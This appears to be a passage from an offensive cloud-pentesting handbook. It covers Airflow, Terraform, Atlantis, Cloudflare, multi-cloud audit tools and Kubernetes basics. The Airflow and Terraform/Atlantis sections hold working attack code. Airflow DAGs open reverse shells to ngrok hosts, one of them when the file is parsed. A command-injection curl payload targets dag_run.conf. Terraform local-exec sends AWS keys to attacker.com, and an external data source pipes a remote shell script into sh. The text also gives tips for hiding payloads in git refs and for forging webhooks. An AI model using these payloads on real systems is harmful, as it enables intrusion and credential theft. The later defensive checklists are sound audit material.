    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
    run = BashOperator(
        task_id='run',
        bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
    )
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator

# Reverse shell callable used by the operators below
def rs(rhost, port):
    s = socket.socket()
    s.connect((rhost, port))
    [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
    pty.spawn("/bin/sh")

with DAG(
    dag_id='rev_shell_python',
    schedule_interval='0 0 * * *',
    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
    run = PythonOperator(
        task_id='rs_python',
        python_callable=rs,
        op_kwargs={"rhost": "8.tcp.ngrok.io", "port": 11433}
    )

# Calling rs() at module level executes the reverse shell when the DAG file is parsed (e.g. by the scheduler)
rs("2.tcp.ngrok.io", 14403)

with DAG(
    dag_id='rev_shell_python2',
    schedule_interval='0 0 * * *',
    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
    run = PythonOperator(
        task_id='rs_python2',
        python_callable=rs,
        op_kwargs={"rhost": "2.tcp.ngrok.io", "port": 144}
    )
DAG Creation
If you manage to compromise a machine inside the DAG cluster, you can create new DAG scripts in the dags/ folder and they will be replicated in the rest of the machines inside the DAG cluster.
All you need to know to start looking for command injections in DAGs
is that parameters are accessed with the code
dag_run.conf.get("param_name") .
Moreover, the same vulnerability might occur with variables (note that with enough privileges you could control the value of the variables in the GUI). Variables are accessed with Variable.get("var_name") in Python code or {{ var.value.var_name }} in templated fields.
If they are used, for example, inside a bash command, you could perform a command injection.
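A hedged sketch of abusing such a parameter from the outside, assuming the Airflow 2 stable REST API is enabled with basic auth and the target DAG templates dag_run.conf.get("param_name") into a bash command (dag id, host and credentials are placeholders):
curl -s -u user:pass -X POST 'http://airflow.example.com:8080/api/v1/dags/target_dag/dagRuns' \
  -H 'Content-Type: application/json' \
  -d '{"conf": {"param_name": "value; bash -i >& /dev/tcp/attacker.com/4444 0>&1"}}'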
There are two ways to access this file: by compromising some Airflow machine, or by accessing the web console.
Note that the values inside the config file might not be the ones actually used, as you can overwrite them by setting env variables such as AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true' .
If you have access to the config file in the web server, you can check the real running configuration in the same page where the config is displayed. If you have access to some machine inside the Airflow env, check the environment.
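For example, a minimal check from a shell on an Airflow machine (AIRFLOW_HOME defaults to ~/airflow):
env | grep -i '^AIRFLOW__'
grep -Ei 'secret_key|password|fernet' "${AIRFLOW_HOME:-$HOME/airflow}/airflow.cfg"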
[api]
access_control_allow_headers : This indicates the allowed headers
for CORS
access_control_allow_methods : This indicates the allowed methods
for CORS
access_control_allow_origins : This indicates the allowed origins
for CORS
auth_backend : According to the docs a few options can be in place
to configure who can access to the API:
airflow.api.auth.backend.deny_all : By default nobody can
access the API
airflow.api.auth.backend.default : Everyone can access it
without authentication
airflow.api.auth.backend.kerberos_auth : To configure
kerberos authentication
airflow.api.auth.backend.basic_auth : For basic
authentication
airflow.composer.api.backend.composer_auth : Uses
composers authentication (GCP) (from here).
composer_auth_user_registration_role : This indicates
the role the composer user will get inside airflow (Op by
default).
You can also create you own authentication method with
python.
google_key_path : Path to the GCP service account key
[atlas]
password : Atlas password
username : Atlas username
[celery]
flower_basic_auth : Credentials
(user1:password1,user2:password2)
result_backend : Postgres url which may contain credentials.
ssl_cacert : Path to the cacert
ssl_cert : Path to the cert
ssl_key : Path to the key
[core]
dag_discovery_safe_mode : Enabled by default. When discovering
DAGs, ignore any files that don’t contain the strings DAG and
airflow .
fernet_key : Key to store encrypted variables (symmetric)
hide_sensitive_var_conn_fields : Enabled by default, hide sensitive
info of connections.
security : What security module to use (for example kerberos)
[dask]
tls_ca : Path to ca
tls_cert : Part to the cert
tls_key : Part to the tls key
[kerberos]
ccache : Path to ccache file
forwardable : Enabled by default
[logging]
google_key_path : Path to GCP JSON creds.
[secrets]
backend : Full class name of secrets backend to enable
backend_kwargs : The backend_kwargs param is loaded into a
dictionary and passed to init of secrets backend class.
[smtp]
smtp_password : SMTP password
smtp_user : SMTP user
[webserver]
cookie_samesite : By default it's Lax, so it's already the weakest
possible value
cookie_secure : Set the secure flag on the session cookie
expose_config : By default is False, if true, the config can be read
from the web console
expose_stacktrace : By default it's True, it will show python
tracebacks (potentially useful for an attacker)
secret_key : This is the key used by flask to sign the cookies (if
you have this you can impersonate any user in Airflow)
web_server_ssl_cert : Path to the SSL cert
web_server_ssl_key : Path to the SSL Key
x_frame_enabled : Default is True, so by default clickjacking isn't
possible
Web Authentication
By default web authentication is specified in the file
webserver_config.py and is configured as
AUTH_TYPE = AUTH_DB
AUTH_TYPE = AUTH_OAUTH
AUTH_ROLE_PUBLIC = 'Admin'
Note that admin users can create more roles with more granular
permissions.
Also note that the only default role with permission to list users and roles
is Admin, not even Op is going to be able to do that.
Default Permissions
These are the default permissions per default role:
Admin
[can delete on Connections, can read on Connections, can edit on
Connections, can create on Connections, can read on DAGs, can edit on
DAGs, can delete on DAGs, can read on DAG Runs, can read on Task
Instances, can edit on Task Instances, can delete on DAG Runs, can create
on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on
ImportError, can delete on Pools, can read on Pools, can edit on Pools, can
create on Pools, can read on Providers, can delete on Variables, can read on
Variables, can edit on Variables, can create on Variables, can read on
XComs, can read on DAG Code, can read on Configurations, can read on
Plugins, can read on Roles, can read on Permissions, can delete on Roles,
can edit on Roles, can create on Roles, can read on Users, can create on
Users, can edit on Users, can delete on Users, can read on DAG
Dependencies, can read on Jobs, can read on My Password, can edit on My
Password, can read on My Profile, can edit on My Profile, can read on SLA
Misses, can read on Task Logs, can read on Website, menu access on
Browse, menu access on DAG Dependencies, menu access on DAG Runs,
menu access on Documentation, menu access on Docs, menu access on
Jobs, menu access on Audit Logs, menu access on Plugins, menu access on
SLA Misses, menu access on Task Instances, can create on Task Instances,
can delete on Task Instances, menu access on Admin, menu access on
Configurations, menu access on Connections, menu access on Pools, menu
access on Variables, menu access on XComs, can delete on XComs, can
read on Task Reschedules, menu access on Task Reschedules, can read on
Triggers, menu access on Triggers, can read on Passwords, can edit on
Passwords, menu access on List Users, menu access on Security, menu
access on List Roles, can read on User Stats Chart, menu access on User's
Statistics, menu access on Base Permissions, can read on View Menus,
menu access on Views/Menus, can read on Permission Views, menu access
on Permission on Views/Menus, can get on MenuApi, menu access on
Providers, can create on XComs]
Op
User
[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on
DAG Runs, can read on Task Instances, can edit on Task Instances, can
delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can
read on Audit Logs, can read on ImportError, can read on XComs, can read
on DAG Code, can read on Plugins, can read on DAG Dependencies, can
read on Jobs, can read on My Password, can edit on My Password, can read
on My Profile, can edit on My Profile, can read on SLA Misses, can read on
Task Logs, can read on Website, menu access on Browse, menu access on
DAG Dependencies, menu access on DAG Runs, menu access on
Documentation, menu access on Docs, menu access on Jobs, menu access
on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu
access on Task Instances, can create on Task Instances, can delete on Task
Instances]
Viewer
[can read on DAGs, can read on DAG Runs, can read on Task Instances,
can read on Audit Logs, can read on ImportError, can read on XComs, can
read on DAG Code, can read on Plugins, can read on DAG Dependencies,
can read on Jobs, can read on My Password, can edit on My Password, can
read on My Profile, can edit on My Profile, can read on SLA Misses, can
read on Task Logs, can read on Website, menu access on Browse, menu
access on DAG Dependencies, menu access on DAG Runs, menu access on
Documentation, menu access on Docs, menu access on Jobs, menu access
on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu
access on Task Instances]
Public
[]
terraform-enterprise-security.md
Terraform Lab
Just install terraform in your computer.
Here you have a guide and here you have the best way to download
terraform.
RCE in Terraform
Terraform doesn't have a platform exposing a web page or a network service that we can enumerate; therefore, the only way to compromise terraform is to be able to add/modify terraform configuration files.
The main way for an attacker to compromise the system where terraform is running is to compromise the repository that stores the terraform configurations, because at some point they are going to be interpreted.
Actually, there are solutions out there that execute terraform plan/apply
automatically after a PR is created, such as Atlantis:
atlantis-security.md
If you are able to compromise a terraform file there are different ways you can perform RCE when someone executes terraform plan or terraform apply .
Terraform plan
Terraform plan is the most used command in terraform and
developers/solutions using terraform call it all the time, so the easiest way
to get RCE is to make sure you poison a terraform config file that will
execute arbitrary commands in a terraform plan .
That’s it:
provider "evil" {}
Since the provider will be pulled in during the init and will run some code during the plan , you have arbitrary code execution.
Instead of adding the rev shell directly into the terraform file, you can
load an external resource that contains the rev shell:
module "not_rev_shell" {
source =
"[email protected]:carlospolop/terraform_external_module_rev_shell
//modules"
}
In the external resource, use the ref feature to hide the terraform rev
shell code in a branch inside of the repo, something like:
git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b
Terraform Apply
Terraform apply will be executed to apply all the changes; you can also abuse it to obtain RCE by injecting a malicious Terraform file with local-exec. You just need to make sure some payload like the following ones ends up in the main.tf file:

// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
  provisioner "local-exec" {
    command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
  }
}
Follow the suggestions from the previous technique to perform this attack in a stealthier way using external references.
Secrets Dumps
You can have secret values used by terraform dumped running
terraform apply by adding to the terraform file something like:
output "dotoken" {
value = nonsensitive(var.do_token)
}
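A minimal usage sketch (assuming an output named dotoken as above): after applying, the value is printed with the outputs and can be read back at any time:
terraform apply -auto-approve
terraform output dotoken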
Audit Tools
tfsec: tfsec uses static analysis of your terraform code to spot potential
misconfigurations.
Terrascan: Terrascan is a static code analyzer for Infrastructure as Code.
References
Atlantis Security
https://alex.kaskaso.li/post/terraform-plan-rce
backend_config.tf
terraform {
  backend "remote" {
    hostname     = "{{TFE_HOSTNAME}}"
    organization = "{{ORGANIZATION_NAME}}"

    workspaces {
      name = "{{WORKSPACE_NAME}}"
    }
  }
}
Pivoting
As previously mentioned, Terraform Enterprise infra may run in any machine/cloud provider using agents. Therefore, if you can execute code in this machine, you could gather cloud credentials from the metadata endpoint (IAM, user data...). Moreover, check the filesystem and environment variables for other potential secrets and API keys. Also, don't forget to check the network where the machine is located.
Protections
Disabling Remote Operations
Many of Terraform Cloud's features rely on remote execution and are not
available when using local operations. This includes features like Sentinel
policy enforcement, cost estimation, and notifications.
You can disable remote operations for any workspace by changing its
Execution Mode to Local. This causes the workspace to act only as a
remote backend for Terraform state, with all execution occurring on your
own workstations or continuous integration workers.
Webhooks
Atlantis optionally uses webhook secrets to validate that the webhooks it receives from your Git host are legitimate.
One way to confirm this would be to allowlist requests to only come from the IPs of your Git host, but an easier way is to use a Webhook Secret.
Note that unless you use a private GitHub or Bitbucket server, you will need to expose webhook endpoints to the Internet.
Atlantis is going to be exposing webhooks so the git server can send it information. From an attacker's perspective it would be interesting to know if you can send it messages.
Provider Credentials
Atlantis runs Terraform by simply executing terraform plan and
apply commands on the server Atlantis is hosted on. Just like when you
run Terraform locally, Atlantis needs credentials for your specific provider.
It's up to you how you provide credentials for your specific provider to
Atlantis:
The Atlantis Helm Chart and AWS Fargate Module have their own
mechanisms for provider credentials. Read their docs.
If you're running Atlantis in a cloud then many clouds have ways to
give cloud API access to applications running on them, ex:
AWS EC2 Roles (Search for "EC2 Role")
GCE Instance Service Accounts
Many users set environment variables, ex. AWS_ACCESS_KEY , where
Atlantis is running.
Others create the necessary config files, ex. ~/.aws/credentials ,
where Atlantis is running.
Use the HashiCorp Vault Provider to obtain provider credentials.
You probably won't find it exposed to the internet, but it looks like by default no credentials are needed to access it (and if they are, atlantis:atlantis are the default ones).
Server Configuration
Configuration to atlantis server can be specified via command line
flags, environment variables, a config file or a mix of the three.
You can find here the list of flags supported by Atlantis server
You can find here how to transform a config option into an env var
1. Flags
2. Environment Variables
3. Config File
Note that in the configuration you might find interesting values such as
tokens and passwords.
Repos Configuration
Some configurations affect how the repos are managed. However, each repo might require different settings, so there are ways to specify settings per repo. This is the priority order:
1. The server side repo config, a yaml configuring new settings for each repo (regexes supported)
2. The per-repo atlantis.yaml file, for the settings the server side config allows it to override
3. Default values
PR Protections
Atlantis allows you to indicate if you want the PR to be approved by somebody else (even if that isn't set in the branch protection) and/or to be mergeable (branch protections passed) before running apply. From a security point of view, setting both options is recommended.
Scripts
The repo config can specify scripts to run before (pre workflow hooks) and
after (post workflow hooks) a workflow is executed.
There isn't any option to allow specifying these scripts in the repo's /atlantis.yml file.
Workflow
In the repo config (server side config) you can specify a new default workflow, or create new custom workflows. You can also specify which repos can access the new ones generated. Then, you can allow the atlantis.yaml file of each repo to specify the workflow to use, which lets anyone with write access to the repo override the workflow that is going to be used. This will basically give RCE in the Atlantis server to any user that can access that repo.
# atlantis.yaml
version: 3
projects:
- dir: .
workflow: custom1
workflows:
custom1:
plan:
steps:
- init
- run: my custom plan command
apply:
steps:
- run: my custom apply command
# Get help
atlantis help
You can do this by making Atlantis load an external data source. Just put a payload like the following in the main.tf file (a minimal external data source that runs a command during plan):
data "external" "example" {
  program = ["sh", "-c", "curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh"]
}
Stealthier Attack
You can perform this attack even in a stealthier way, by following this
suggestions:
Instead of adding the rev shell directly into the terraform file, you can
load an external resource that contains the rev shell:
module "not_rev_shell" {
source =
"[email protected]:carlospolop/terraform_external_module_rev_shell
//modules"
}
In the external resource, use the ref feature to hide the terraform rev
shell code in a branch inside of the repo, something like:
git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b
Follow the suggestions from the previous technique to perform this attack in a stealthier way.
Custom Workflow
Running malicious custom build commands specified in an atlantis.yaml file. Atlantis uses the atlantis.yaml file from the pull request branch, not the one from master. This possibility was mentioned in a previous section:
This will basically give RCE in the Atlantis server to any user that can access that repo.
# atlantis.yaml
version: 3
projects:
- dir: .
workflow: custom1
workflows:
custom1:
plan:
steps:
- init
- run: my custom plan command
apply:
steps:
- run: my custom apply command
repos:
- id: /.*/
apply_requirements: []
PR Hijacking
If someone sends atlantis plan/apply comments on your valid pull requests, it will cause terraform to run when you don't want it to.
Moreover, if branch protection isn't configured to require re-evaluation of every PR when a new commit is pushed to it, someone could write malicious configs (check previous scenarios) in the terraform config, run atlantis plan/apply and gain RCE.
Webhook Secret
If you manage to steal the webhook secret used, or if there isn't any webhook secret being used, you could call the Atlantis webhook and invoke atlantis commands directly.
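A hedged sketch of forging such a webhook call, assuming a GitHub-style integration (the /events path, the header names and payload.json with a crafted PR comment event are assumptions to verify against the target):
SECRET='<stolen_or_empty_webhook_secret>'
SIG=$(openssl dgst -sha256 -hmac "$SECRET" -hex < payload.json | awk '{print $NF}')
curl -s -X POST 'https://atlantis.example.com/events' \
  -H 'X-GitHub-Event: issue_comment' \
  -H "X-Hub-Signature-256: sha256=$SIG" \
  -H 'Content-Type: application/json' \
  --data-binary @payload.json   # payload.json contains a PR comment with "atlantis apply"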
Bitbucket
Bitbucket Cloud does not support webhook secrets. This could allow
attackers to spoof requests from Bitbucket. Ensure you are allowing only
Bitbucket IPs.
--repo-allowlist
Atlantis requires you to specify an allowlist of repositories it will accept webhooks from via the --repo-allowlist flag. For example:
--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests
--repo-allowlist=github.com/runatlantis/*
--repo-allowlist=github.yourcompany.com/*
All repositories: --repo-allowlist=* . Useful for when you're in a protected network but dangerous without also setting a webhook secret.
This flag ensures your Atlantis install isn't being used with repositories you
don't control. See atlantis server --help for more details.
1. Bake providers into the Atlantis image or host and deny egress in
production.
2. Implement the provider registry protocol internally and deny public
egress, that way you control who has write access to the registry.
3. Modify your server-side repo configuration's plan step to validate against the use of disallowed providers or data sources, or PRs from unauthorized users. You could also add extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the plan to continue. Conftest could be of use here.
Webhook Secrets
Atlantis should be run with webhook secrets set via the $ATLANTIS_GH_WEBHOOK_SECRET / $ATLANTIS_GITLAB_WEBHOOK_SECRET environment variables.
If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
SSL/HTTPS
If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the --ssl-cert-file and --ssl-key-file flags.
You can also protect the web UI with basic auth, passing these settings as environment variables: ATLANTIS_WEB_BASIC_AUTH=true , ATLANTIS_WEB_USERNAME=yourUsername and ATLANTIS_WEB_PASSWORD=yourPassword .
References
https://www.runatlantis.io/docs
cloudflare-domains.md
Domain Registration
[ ] In Transfer Domains check that it's not possible to transfer any
domain.
cloudflare-domains.md
Analytics
I couldn't find anything to check for a config security review.
Pages
On each Cloudflare's page:
[ ] The triggers: What makes the worker trigger? Can a user send data
that will be used by the worker?
[ ] In the Settings , check for Variables containing sensitive
information
[ ] Check the code of the worker and search for vulnerabilities
(specially in places where the user can manage the input)
Check for SSRFs returning the indicated page that you can
control
Check XSSs executing JS inside a svg image
Edge Certificates
[ ] Always Use HTTPS should be enabled
[ ] HTTP Strict Transport Security (HSTS) should be enabled
[ ] Minimum TLS Version should be 1.2
[ ] TLS 1.3 should be enabled
[ ] Automatic HTTPS Rewrites should be enabled
[ ] Certificate Transparency Monitoring should be enabled
Security
[ ] In the WAF section it's interesting to check that Firewall and rate
limiting rules are used to prevent abuses.
The Bypass action will disable Cloudflare security features for
a request. It shouldn't be used.
[ ] In the Page Shield section it's recommended to check that it's
enabled if any page is used
[ ] In the API Shield section it's recommended to check that it's
enabled if any API is exposed in Cloudflare
[ ] In the DDoS section it's recommended to enable the DDoS
protections
[ ] In the Settings section:
[ ] Check that the Security Level is medium or greater
[ ] Check that the Challenge Passage is 1 hour at max
[ ] Check that the Browser Integrity Check is enabled
[ ] Check that the Privacy Pass Support is enabled
Access
cloudflare-zero-trust-network.md
Speed
I couldn't find any option related to security
Caching
[ ] In the Configuration section consider enabling the CSAM
Scanning Tool
Workers Routes
You should have already checked Cloudflare Workers
Rules
TODO
Network
[ ] If HTTP/2 is enabled, HTTP/2 to Origin should be enabled
[ ] HTTP/3 (with QUIC) should be enabled
[ ] If the privacy of your users is important, make sure Onion
Routing is enabled
Traffic
TODO
Custom Pages
[ ] It's optional to configure custom pages when an error related to
security is triggered (like a block, rate limiting or I'm under attack
mode)
Apps
TODO
Scrape Shield
[ ] Check Email Address Obfuscation is enabled
[ ] Check Server-side Excludes is enabled
Zaraz
TODO
Web3
TODO
[ ] Check who can access the application in the Policies and check that only the users that need access to the application can access it.
To allow access Access Groups are going to be used (and
additional rules can be set also)
[ ] Check the available identity providers and make sure they aren't
too open
[ ] In Settings :
[ ] Check CORS isn't enabled (if it's enabled, check it's secure
and it isn't allowing everything)
[ ] Cookies should have Strict Same-Site attribute, HTTP Only
and binding cookie should be enabled if the application is HTTP.
[ ] Consider enabling also Browser rendering for better
protection. More info about remote browser isolation here.
Access Groups
[ ] Check that the access groups generated are correctly restricted to
the users they should allow.
[ ] It's specially important to check that the default access group isn't
very open (it's not allowing too many people) as by default anyone
in that group is going to be able to access applications.
Note that it's possible to give access to EVERYONE and other
very open policies that aren't recommended unless 100%
necessary.
Service Auth
[ ] Check that all service tokens expires in 1 year or less
Tunnels
TODO
My Team
TODO
Logs
[ ] You could search for unexpected actions from users
Settings
[ ] Check the plan type
[ ] It's possible to see the credit card owner name, last 4 digits, expiration date and address
[ ] It's recommended to add a User Seat Expiration to remove users that don't really use this service
Drone
TeamCity
BuildKite
OctopusDeploy
Rancher
Mesosphere
Radicle
Benchmark checks
This will help you understand the size of the environment and the services used
It will also allow you to find some quick misconfigurations, as you can perform most of these tests with automated tools
Services Enumeration
You probably won't find many more misconfigurations here if you performed the benchmark tests correctly, but you might find some that weren't being looked for in the benchmark tests.
This will allow you to know what exactly is being used in the cloud env
This will help a lot in the next steps
Check Exposed services
This can be done during the previous section; you need to find out everything that is potentially exposed to the Internet somehow and how it can be accessed.
Here I'm talking about manually exposed infrastructure like instances with web pages or other ports being exposed, and also about other cloud managed services that can be configured to be exposed (such as DBs or buckets)
Then you should check if that resource can be exposed or not (confidential information? vulnerabilities? misconfigurations in the exposed service?)
Check permissions
Here you should find out all the permissions of each role/user inside the cloud and how they are used
Too many highly privileged (control everything) accounts? Generated keys not used?... Most of these checks should have been done in the benchmark tests already
If the client is using OpenID or SAML or another federation you might need to ask them for further information about how each role is assigned (it's not the same if the admin role is assigned to 1 user or to 100)
It's not enough to find which users have admin permissions "*:*". There are a lot of other permissions that, depending on the services used, can be very sensitive.
Moreover, there are potential privesc paths to follow by abusing permissions. All these things should be taken into account and as many privesc paths as possible should be reported.
Check Integrations
It's highly probable that integrations with other clouds or SaaS are being used inside the cloud env.
For integrations of the cloud you are auditing with other platforms, you should note who has access to (ab)use that integration and ask how sensitive the action being performed is. For example, who can write in an AWS bucket where GCP is getting data from (ask how sensitive the action in GCP treating that data is).
For integrations inside the cloud you are auditing from external platforms, you should ask who has access externally to (ab)use that integration and check how that data is being used. For example, if a service is using a Docker image hosted in GCR, you should ask who has access to modify that, and which sensitive info and access that image will get when executed inside an AWS cloud.
Multi-Cloud tools
There are several tools that can be used to test different cloud environments.
The installation steps and links are going to be indicated in this section.
PurplePanda
A tool to identify bad configurations and privesc path in clouds and
across clouds/SaaS.
Install
GCP
export GOOGLE_DISCOVERY=$(echo 'google:
- file_path: ""
- file_path: ""
service_account_id: "some-sa-
[email protected]"' | base64)
CloudSploit
AWS, Azure, Github, Google, Oracle, Alibaba
Install
# Install
git clone https://github.com/aquasecurity/cloudsploit.git
cd cloudsploit
npm install
./index.js -h
## Docker instructions in github
GCP
## You need to have creds for a service account and set them in
config.js file
./index.js --cloud google --config </abs/path/to/config.js>
ScoutSuite
AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
Install
GCP
SCOUT_FOLDER_REPORT="/tmp"
for pid in $(gcloud projects list --format="value(projectId)"); do
    echo "================================================"
    echo "Checking $pid"
    mkdir "$SCOUT_FOLDER_REPORT/$pid"
    scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid"
done
Steampipe
Install Download and install Steampipe (https://steampipe.io/downloads).
Or use Brew:
GCP
# Use https://github.com/turbot/steampipe-mod-gcp-
compliance.git
git clone https://github.com/turbot/steampipe-mod-gcp-
compliance.git
cd steampipe-mod-gcp-compliance
# To run all the checks from the dashboard
steampipe dashboard
# To run all the checks from the CLI
steampipe check all
AWS
# Install aws plugin
steampipe plugin install aws
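Mirroring the GCP flow above, the AWS checks can presumably be run with the AWS compliance mod (assuming turbot/steampipe-mod-aws-compliance):
git clone https://github.com/turbot/steampipe-mod-aws-compliance.git
cd steampipe-mod-aws-compliance
steampipe check all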
Nessus
Nessus has an Audit Cloud Infrastructure scan supporting: AWS, Azure,
Office 365, Rackspace, Salesforce. Some extra configurations in Azure are
needed to obtain a Client Id.
cloudlist
Cloudlist is a multi-cloud tool for getting Assets (Hostnames, IP
Addresses) from Cloud Providers.
Cloudlist
cd /tmp
wget https://github.com/projectdiscovery/cloudlist/releases/latest/download/cloudlist_1.0.1_macOS_arm64.zip
unzip cloudlist_1.0.1_macOS_arm64.zip
chmod +x cloudlist
sudo mv cloudlist /usr/local/bin
## For GCP it requires service account JSON credentials
cloudlist -config </path/to/config>
cartography
Cartography is a Python tool that consolidates infrastructure assets and the
relationships between them in an intuitive graph view powered by a Neo4j
database.
Install
# Installation
docker image pull ghcr.io/lyft/cartography
docker run --platform linux/amd64 ghcr.io/lyft/cartography
cartography --help
## Install a Neo4j DB version 3.5.*
GCP
docker run --platform linux/amd64 \
    --volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \
    -e GOOGLE_APPLICATION_CREDENTIALS="/application_default_credentials.json" \
    -e NEO4j_PASSWORD="s3cr3t" \
    ghcr.io/lyft/cartography \
    --neo4j-uri bolt://host.docker.internal:7687 \
    --neo4j-password-env-var NEO4j_PASSWORD \
    --neo4j-user neo4j
starbase
Starbase collects assets and relationships from services and systems
including cloud infrastructure, SaaS applications, security controls, and
more into an intuitive graph view backed by the Neo4j database.
Install
# You are going to need Node version 14, so install nvm
following https://tecadmin.net/install-nvm-macos-with-homebrew/
npm install --global yarn
nvm install 14
git clone https://github.com/JupiterOne/starbase.git
cd starbase
nvm use 14
yarn install
yarn starbase --help
# Configure manually config.yaml depending on the env to
analyze
yarn starbase setup
yarn starbase run
# Docker
git clone https://github.com/JupiterOne/starbase.git
cd starbase
cp config.yaml.example config.yaml
# Configure manually config.yaml depending on the env to
analyze
docker build --no-cache -t starbase:latest .
docker-compose run starbase setup
docker-compose run starbase run
GCP
## Config for GCP
### Check out: https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md
### It requires service account credentials

integrations:
  -
    name: graph-google-cloud
    instanceId: testInstanceId
    directory: ./.integrations/graph-google-cloud
    gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git
    config:
      SERVICE_ACCOUNT_KEY_FILE: '{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}'
      PROJECT_ID: ""
      FOLDER_ID: ""
      ORGANIZATION_ID: ""
      CONFIGURE_ORGANIZATION_PROJECTS: false

storage:
  engine: neo4j
  config:
    username: neo4j
    password: s3cr3t
    uri: bolt://localhost:7687
    #Consider using host.docker.internal if from docker
SkyArk
Discover the most privileged users in the scanned AWS or Azure
environment, including the AWS Shadow Admins. It uses powershell.
Cloud Brute
A tool to find a company (target) infrastructure, files, and apps on the top
cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr,
Linode).
Workspace
workspace-security.md
AWS
aws-security
Azure
Access the portal here: http://portal.azure.com/. To start the tests you should have access with a user with Reader permissions over the subscription and the Global Reader role in AzureAD. If even in that case you are not able to access the content of the Storage accounts, you can fix it with the role Storage Account Contributor.
Run scanners
Run the scanners to look for vulnerabilities and compare the security
measures implemented with CIS.
Attack Graph
Stormspotter creates an "attack graph" of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.
More checks
Check for a high number of Global Admin (between 2-4 are
recommended). Access it on:
https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirector
yMenuBlade/Overview
Global admins should have MFA activated. Go to Users and click on
Multi-Factor Authentication button.
Dedicated admin account shouldn't have mailboxes (they can only
have mailboxes if they have Office 365).
Local AD shouldn't be synced with Azure AD if not needed (https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/AzureADConnect). And if synced, Password Hash Sync should be enabled for reliability. In this case it's disabled:
Global Administrators shouldn't be synced from a local AD. Check if Global Administrator emails use the domain onmicrosoft.com. If not, check the source of the user; the source should be Azure Active Directory, and if it comes from Windows Server AD, then report it.
Standard tier is recommended instead of free tier (see the tier being
used in Pricing & Settings or in
https://portal.azure.com/#blade/Microsoft_Azure_Security/SecurityMe
nuBlade/24)
Periodic SQL servers scans:
Select the SQL server --> Make sure that 'Advanced data security' is
set to 'On' --> Under 'Vulnerability assessment settings', set 'Periodic
recurring scans' to 'On', and configure a storage account for storing
vulnerability assessment scan results --> Click Save
Lack of App Services restrictions: Look for "App Services" in Azure (https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites) and check if any is being used. In that case go through each App checking for "Access Restrictions"; if there aren't any rules, report it. The access to the app service should be restricted according to the needs.
Office365
You need Global Admin or at least Global Admin Reader (but note that
Global Admin Reader is a little bit limited). However, those limitations
appear in some PS modules and can be bypassed accessing the features via
the web application.
Other Cloud Pentesting Guides
https://hackingthe.cloud
kubernetes-basics.md
Pentesting Kubernetes
From the Outside
There are several possible Kubernetes services that you could find exposed on the Internet (or inside internal networks). If you find them you know there is a Kubernetes environment there.
pentesting-kubernetes-services.md
attacking-kubernetes-from-inside-a-pod.md
kubernetes-enumeration.md
Another important detail about enumeration and Kubernetes permissions abuse is the Kubernetes Role-Based Access Control (RBAC). If you want to abuse permissions, you should first read about it here:
kubernetes-role-based-access-control-rbac.md
kubernetes-namespace-escalation.md
kubernetes-pivoting-to-clouds.md
Labs to practice and learn
https://securekubernetes.com/
https://madhuakula.com/kubernetes-goat/index.html
Hardening Kubernetes
kubernetes-hardening
Kubernetes Basics
The original author of this page is Jorge (read his original post here)
Architecture & Basics
What does Kubernetes do?
Allows running container/s in a container engine.
Schedules containers efficiently.
Keeps containers alive.
Allows container communications.
Allows deployment techniques.
Handles volumes of information.
Architecture
Node: operating system with pod or pods.
Pod: Wrapper around a container or multiple containers. A pod should only contain one application (so usually, a pod runs just 1 container). The pod is the way kubernetes abstracts the container technology running.
Service: Each pod has 1 internal IP address from the internal range of the node. However, it can also be exposed via a service. The service also has an IP address and its goal is to maintain the communication between pods, so if one dies the new replacement (with a different internal IP) will be accessible exposed on the same IP of the service. It can be configured as internal or external. The service also acts as a load balancer when 2 pods are connected to the same service. When a service is created you can find the endpoints of each service running kubectl get endpoints
Note that as there might be several nodes (running several pods), there might also be several master processes whose access to the API server is load balanced and whose etcd is synchronized.
Volumes:
When a pod creates data that shouldn't be lost when the pod disappears, it should be stored in a physical volume. Kubernetes allows attaching a volume to a pod to persist the data. The volume can be in the local machine or in a remote storage. If you are running pods in different physical nodes you should use a remote storage so all the pods can access it.
Other configurations:
ConfigMap: You can configure URLs to access services. The pod will
obtain data from here to know how to communicate with the rest of the
services (pods). Note that this is not the recommended place to save
credentials!
Secret: This is the place to store secret data like passwords, API
keys... encoded in B64. The pod will be able to access this data to use
the required credentials.
Deployments: This is where the components to be run by kubernetes are indicated. A user usually won't work directly with pods; pods are abstracted in ReplicaSets (number of identical pods replicated), which are run via deployments. Note that deployments are for stateless applications. The minimum configuration for a deployment is the name and the image to run.
